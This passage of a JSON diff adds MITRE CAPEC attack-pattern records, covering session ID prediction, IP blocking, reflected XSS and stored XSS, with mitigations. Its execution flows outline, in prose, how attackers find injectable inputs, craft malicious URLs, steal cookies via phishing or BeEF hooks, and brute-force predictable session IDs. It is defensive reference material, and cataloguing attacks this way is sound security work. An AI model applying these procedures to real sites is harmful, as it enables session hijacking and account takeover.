}, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--7ee89c1f-50a5-42e6-abdb-6d8ba0349810", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Session Credential Falsification through Prediction", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Jetty before 4.2.27, 5.1 before 5.1.12, 6.0 before 6.0.2, and 6.1 before 6.1.0pre3 generates predictable session identifiers using java.util.random, which makes it easier for remote attackers to guess a session identifier through brute force attacks, bypass authentication requirements, and possibly conduct cross-site request forgery attacks. See also: CVE-2006-6969", + "mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication. See also: CVE-2001-1534" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find Session IDs: The attacker interacts with the target host and finds that session IDs are used to authenticate users.

  2. Techniques
    An attacker makes many anonymous connections and records the session IDs assigned.
    An attacker makes authorized connections and records the session tokens or credentials issued.
  3. Characterize IDs: The attacker studies the characteristics of the session ID (size, format, etc.). As a results the attacker finds that legitimate session IDs are predictable.

  4. Techniques
    Cryptanalysis. The attacker uses cryptanalysis to determine if the session IDs contain any cryptographic protections.
    Pattern tests. The attacker looks for patterns (odd/even, repetition, multiples, or other arithmetic relationships) between IDs
    Comparison against time. The attacker plots or compares the issued IDs to the time they were issued to check for correlation.

Experiment

  1. Match issued IDs: The attacker brute forces different values of session ID and manages to predict a valid session ID.

  2. Techniques
    The attacker models the session ID algorithm enough to produce a compatible session IDs, or just one match.

Exploit

  1. Use matched Session ID: The attacker uses the falsified session ID to access the target system.

  2. Techniques
    The attacker loads the session ID into their web browser and browses to restricted data or functionality.
    The attacker loads the session ID into their network communications and impersonates a legitimate user to gain access to data or functionality.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target host uses session IDs to keep track of the users.", + "Session IDs are used to control access to resources.", + "The session IDs used by the target host are predictable. For example, the session IDs are generated using predictable information (e.g., time)." + ], + "x_capec_skills_required": { + "Low": "There are tools to brute force session ID. Those tools require a low level of knowledge.", + "Medium": "Predicting Session ID may require more computation work which uses advanced analysis such as statistical analysis." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use a strong source of randomness to generate a session ID.", + "id": "course-of-action--331d7a82-5ec2-4222-9a34-3dd042df0332", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-59-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9653be54-5c63-4cb9-a759-0537fc56da14", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--331d7a82-5ec2-4222-9a34-3dd042df0332", + "spec_version": "2.1", + "target_ref": "attack-pattern--7ee89c1f-50a5-42e6-abdb-6d8ba0349810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use adequate length session IDs", + "id": 
"course-of-action--26815e36-facf-44a4-98fa-472dec102e01", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-59-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2b5dfcf0-d8fd-4206-b790-076311f94f3b", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--26815e36-facf-44a4-98fa-472dec102e01", + "spec_version": "2.1", + "target_ref": "attack-pattern--7ee89c1f-50a5-42e6-abdb-6d8ba0349810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not use information available to the user in order to generate session ID (e.g., time).", + "id": "course-of-action--c4b1f9f3-b1f6-4741-8fa9-b3ba8e8189ec", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-59-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--faa68fd6-54d2-4ba3-ad2b-1dd82865bae5", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c4b1f9f3-b1f6-4741-8fa9-b3ba8e8189ec", + "spec_version": "2.1", + "target_ref": "attack-pattern--7ee89c1f-50a5-42e6-abdb-6d8ba0349810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + 
"created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ideas for creating random numbers are offered by Eastlake [RFC1750]", + "id": "course-of-action--6d597339-bf05-4276-b31f-4cda813cd170", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-59-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2c1ee684-47b3-455a-a377-97959a7a6492", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6d597339-bf05-4276-b31f-4cda813cd170", + "spec_version": "2.1", + "target_ref": "attack-pattern--7ee89c1f-50a5-42e6-abdb-6d8ba0349810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Encrypt the session ID if you expose it to the user. 
For instance session ID can be stored in a cookie in encrypted format.", + "id": "course-of-action--bd948cdf-d470-4ae5-a2fa-3183fe8eb425", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-59-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dafccdf5-4f55-4b8f-888e-9e37f2ccbbd5", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bd948cdf-d470-4ae5-a2fa-3183fe8eb425", + "spec_version": "2.1", + "target_ref": "attack-pattern--7ee89c1f-50a5-42e6-abdb-6d8ba0349810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary performing this type of attack drops packets destined for a target IP address. 
The aim is to prevent access to the service hosted at the target IP address.", + "external_references": [ + { + "external_id": "CAPEC-590", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/590.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + }, + { + "description": "Abdelberi Chaabane, Terence Chen, Mathieu Cunche, Emiliano De Cristofaro, Arik Friedman, Mohamed Ali Kaafar, Censorship in the Wild: Analyzing Internet Filtering in Syria, 2014--02, IMC 2014", + "external_id": "REF-475", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--5c216971-78b5-4ac1-9cbe-f46fe1c632d1", + "modified": "2019-04-04T00:00:00.000Z", + "name": "IP Address Blocking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ec0de204-6b66-4c4f-a401-21afa72f3941" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Blocking packets intended for a target IP address denies its availability to the user.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "Consider situations of information censorship for political purposes, where regimes that prevent access to specific web services." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "This attack requires the ability to conduct deep packet inspection with an In-Path device that can drop the targeted traffic and/or connection." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Have a large pool of backup IPs built into the application and support proxy capability in the application.", + "id": "course-of-action--5e20e7f2-3b85-4548-9a70-bceee0970a14", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-590-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fba19fbc-d42f-448a-8713-882e084e8a75", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5e20e7f2-3b85-4548-9a70-bceee0970a14", + "spec_version": "2.1", + "target_ref": "attack-pattern--5c216971-78b5-4ac1-9cbe-f46fe1c632d1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of attack is a form of Cross-Site Scripting (XSS) where a malicious script is \"reflected\" off a vulnerable web application and then executed by a victim's browser. 
The process starts with an adversary delivering a malicious script to a victim and convincing the victim to send the script to the vulnerable web application.", + "external_references": [ + { + "external_id": "CAPEC-591", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/591.html" + }, + { + "external_id": "CWE-79", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/79.html" + }, + { + "description": "Watchfire Research, XSS vulnerabilities in Google.com, Full Disclosure mailing list archives", + "external_id": "REF-476", + "source_name": "reference_from_CAPEC", + "url": "http://seclists.org/fulldisclosure/2005/Dec/1107" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-604", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting.html" + } + ], + "id": "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Reflected XSS", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges (A successful Reflected XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)" + ], + "Authorization": [ + "Gain Privileges (A successful Reflected XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)" + ], + "Availability": [ + "Execute Unauthorized Commands (A successful Reflected 
attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)" + ], + "Confidentiality": [ + "Read Data (A successful Reflected XSS attack can enable an adversary to exfiltrate sensitive information from the application.)", + "Gain Privileges (A successful Reflected XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)", + "Execute Unauthorized Commands (A successful Reflected attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (A successful Reflected attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)", + "Modify Data (A successful Reflected attack can allow an adversary to tamper with application data.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Consider a web application that enables or disables some of the fields of a form on the page via the use of a mode parameter provided on the query string.\n http://my.site.com/aform.html?mode=full\n The application’s server-side code may want to display this mode value in the HTML page being created to give the users an understanding of what mode they are in. In this example, PHP is used to pull the value from the URL and generate the desired HTML.\n \n Notice how the value provided on the URL is used directly with no input validation performed and no output encoding in place. A maliciously crafted URL can thus be formed such that if a victim clicked on the URL, a malicious script would then be executed by the victim’s browser:\n http://my.site.com/aform.html?mode=\n ", + "\n Reflected XSS attacks can take advantage of HTTP headers to compromise a victim. 
For example, assume a vulnerable web application called ‘mysite’ dynamically generates a link using an HTTP header such as HTTP_REFERER. Code somewhere in the application could look like:\n Test URL\"?>\n The HTTP_REFERER header is populated with the URI that linked to the currently executing page. A web site can be created and hosted by an adversary that takes advantage of this by adding a reference to the vulnerable web application. By tricking a victim into clicking a link that executes the attacker’s web page, such as:\n \"http://attackerswebsite.com?\"\n The vulnerable web application ('mysite') is now called via the attacker's web site, initiated by the victim's web browser. The HTTP_REFERER header will contain a malicious script, which is embedded into the page by the vulnerable application and served to the victim. The victim’s web browser then executes the injected script, thus compromising the victim’s machine.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe identified potential entry points for reflected XSS vulnerability: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects various common script payloads and special characters to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.

  2. Techniques
    Use a list of XSS probe strings to inject script in parameters of known URLs. If possible, the probe strings contain a unique identifier.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.
    Use a list of HTML special characters to inject into parameters of known URLs and check if they were properly encoded, replaced, or filtered out.
  3. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.

  4. Techniques
    Change a URL parameter to include a malicious script tag.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

  2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_extended_description": "\n The most common method of this is through a phishing email where the adversary embeds the malicious script with a URL that the victim then clicks on. In processing the subsequent request, the vulnerable web application incorrectly considers the malicious script as valid input and uses it to creates a reposnse that is then sent back to the victim. To launch a successful Reflected XSS attack, an adversary looks for places where user-input is used directly in the generation of a response. This often involves elements that are not expected to host scripts such as image tags (), or the addition of event attibutes such as onload and onmouseover. These elements are often not subject to the same input validation, output encoding, and other content filtering and checking routines.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--89697649-1004-4130-a9dd-72182e4c6206", + "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2", + "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "attack-pattern--eade303a-1d70-4095-96da-5cf1d9f4333f", + "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "attack-pattern--66b042e0-f88f-4aa5-9d87-1e71a4b3dcd8", + "attack-pattern--52b5f7dc-228b-44d5-865a-e4595b227ba2", + "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e" + ], + "x_capec_prerequisites": [ + "An application that leverages a client-side web browser with scripting enabled.", + "An application that fail to adequately sanitize or encode untrusted input." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Requires the ability to write malicious scripts and embed them into HTTP requests." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--38865cc3-9b96-4cac-807c-bf7bad91ecd3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7dc1cd16-6e36-4b01-bee9-f089fc544d5a", + "spec_version": "2.1", + "target_ref": "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1d36c215-a1eb-43b0-891e-fa3bab2cf037", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e2d6481d-fb04-45e8-9e24-706eeca3f87d", + "spec_version": "2.1", + "target_ref": "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--34cccb39-8413-4427-800d-cb131ff13a29", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e2e8032-4e25-4013-b914-eb89f14df01f", + "spec_version": "2.1", + "target_ref": "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary utilizes a 
form of Cross-site Scripting (XSS) where a malicious script is persistently \"stored\" within the data storage of a vulnerable web application as valid input.", + "external_references": [ + { + "external_id": "CAPEC-592", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/592.html" + }, + { + "external_id": "CWE-79", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/79.html" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-605", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_Stored_Cross_Site_Scripting.html" + } + ], + "id": "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Stored XSS", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486" + ], + "x_capec_child_of_refs": [ + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges (A successful Stored XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)" + ], + "Authorization": [ + "Gain Privileges (A successful Stored XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)" + ], + "Availability": [ + "Execute Unauthorized Commands (A successful Stored XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the 
application.)" + ], + "Confidentiality": [ + "Read Data (A successful Stored XSS attack can enable an adversary to exfiltrate sensitive information from the application.)", + "Gain Privileges (A successful Stored XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)", + "Execute Unauthorized Commands (A successful Stored XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (A successful Stored XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)", + "Modify Data (A successful Stored XSS attack can allow an adversary to tamper with application data.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An adversary determines that a system uses a web based interface for administration. The adversary creates a new user record and supplies a malicious script in the user name field. The user name field is not validated by the system and a new log entry is created detailing the creation of the new user. Later, an administrator reviews the log in the administrative console. When the administrator comes across the new user entry, the browser sees a script and executes it, stealing the administrator's authentication cookie and forwarding it to the adversary. An adversary then uses the received authentication cookie to log in to the system as an administrator, provided that the administrator console can be accessed remotely.", + "An online discussion forum allows its members to post HTML-enabled messages, which can also include image tags. An adversary embeds JavaScript in the image tags of their message. The adversary then sends the victim an email advertising free goods and provides a link to the form for how to collect. 
When the victim visits the forum and reads the message, the malicious script is executed within the victim's browser." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for stored user-controllable inputs: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application. The adversary is looking for areas where user input is stored, such as user profiles, shopping carts, file managers, forums, blogs, and logs.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points.
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe identified potential entry points for stored XSS vulnerability: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects various common script payloads and special characters to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.

  2. Techniques
    Use a list of XSS probe strings to submit script in input fields that could be stored by the web application. If possible, the probe strings contain a unique identifier so they can be queried for after submitting to see if they are stored.
    Use a list of HTML special characters to submit in input fields that could be stored by the web application and check if they were properly encoded, replaced, or filtered out.
  3. Store malicious XSS content: Once the adversary has determined which stored locations are vulnerable to XSS, they will interact with the web application to store the malicious content. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from a victim.

  4. Techniques
    Store a malicious script on a page that will execute when viewed by the victim.
    Use a tool such as BeEF to store a hook into the web application. This will alert the adversary when the victim has accessed the content and will give the adversary control over the victim's browser, allowing them access to cookies, user screenshot, user clipboard, and more complex XSS attacks.

Exploit

  1. Get victim to view stored content: In order for the attack to be successful, the victim needs to view the stored malicious content on the webpage.

  2. Techniques
    Send a phishing email to the victim containing a URL that will direct them to the malicious stored content.
    Simply wait for a victim to view the content. This is viable in situations where content is posted to a popular public forum.
", + "x_capec_extended_description": "\n Initially presented by an adversary to the vulnerable web application, the malicious script is incorrectly considered valid input and is not properly encoded by the web application. A victim is then convinced to use the web application in a way that creates a response that includes the malicious script. This response is subsequently sent to the victim and the malicious script is executed by the victim's browser. To launch a successful Stored XSS attack, an adversary looks for places where stored input data is used in the generation of a response. This often involves elements that are not expected to host scripts such as image tags (), or the addition of event attributes such as onload and onmouseover. These elements are often not subject to the same input validation, output encoding, and other content filtering and checking routines.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--89697649-1004-4130-a9dd-72182e4c6206", + "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2", + "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "attack-pattern--b27e3b46-2838-4339-a570-006474c8c402", + "attack-pattern--eade303a-1d70-4095-96da-5cf1d9f4333f", + "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "attack-pattern--66b042e0-f88f-4aa5-9d87-1e71a4b3dcd8", + "attack-pattern--52b5f7dc-228b-44d5-865a-e4595b227ba2", + "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e" + ], + "x_capec_prerequisites": [ + "An application that leverages a client-side web browser with scripting enabled.", + "An application that fails to adequately sanitize or encode untrusted input.", + "An application that stores information provided by the user in data storage of some kind." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." 
+ ], + "x_capec_skills_required": { + "Medium": "Requires the ability to write scripts of varying complexity and to inject them through user controlled fields within the application." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--28c01d45-e477-41b8-b923-e1a759ec7c34", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7dc1cd16-6e36-4b01-bee9-f089fc544d5a", + "spec_version": "2.1", + "target_ref": "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e027d6bd-c85f-4585-8bae-468b1e9f5507", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e2d6481d-fb04-45e8-9e24-706eeca3f87d", + "spec_version": "2.1", + "target_ref": "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that all user-supplied input is validated before being stored.", + "id": "course-of-action--00d95d33-0be2-4026-b367-d0b3ca061978", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-592-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": 
"2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fc721152-28b2-4c41-8360-1075efd36665", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--00d95d33-0be2-4026-b367-d0b3ca061978", + "spec_version": "2.1", + "target_ref": "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of attack involves an adversary that exploits weaknesses in an application's use of sessions in performing authentication. The adversary is able to steal or manipulate an active session and use it to gain unathorized access to the application.", + "external_references": [ + { + "external_id": "CAPEC-593", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/593.html" + }, + { + "external_id": "CWE-287", + "source_name": 